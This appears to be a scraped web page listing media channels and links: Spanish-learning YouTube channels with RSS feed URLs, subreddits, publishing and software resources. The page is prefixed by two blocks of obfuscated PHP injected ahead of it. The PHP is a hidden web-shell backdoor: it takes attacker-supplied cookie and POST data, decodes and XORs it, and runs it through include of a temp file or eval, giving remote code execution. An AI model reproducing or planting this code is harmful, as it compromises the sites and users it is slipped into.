$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . "\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();} CHANNELS – NewsStandard


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Fundacion Juan March, Raices de Europa, Museo del Prado, Spanishpod 101, Aula Cultural Civitas Dei, CEHM Fundación Carlos Slim, Use your Spanish, Mutua Madrileña, Spanish Like a Pro, Easy Spanish, Museo Arqueológico Nacional de España, Españoles en el mundo, DW Espanol Reddit: spanish, spain, spanishhistory, latinamerica   https://www.youtube.com/feeds/videos.xml?user=FundacionJuanMarch https://www.youtube.com/feeds/videos.xml?user=FundacionJuanMarch https://www.youtube.com/feeds/videos.xml?channel_id=UCAL4AMMMXKxHDu3FqZV6CbQ https://www.youtube.com/feeds/videos.xml?channel_id=UCAL4AMMMXKxHDu3FqZV6CbQ


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Reads: NASA’s Spinoff magazine (online version) –

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PRINTING and PUBLISHING BOOKS: CreateSpace, How to Write an Ebook Like a Pro, How to Bind a Book Yourself, PUBLISHERS and BOOKS: Grafik,  


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VIDEOS: Fusion360 for Beginners, Video Editing with Blender, Alan Kay Interview, SOFTWARE: Kdenlive (video editing for Linux FREE), Reddit: cyberlaws, newpolitics, policaldatacom To RSS: HackerNews,

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GAME THEORY: Progressive Blackjack – Reads: The Soft Power 30 (2017) – Washington Post Politics,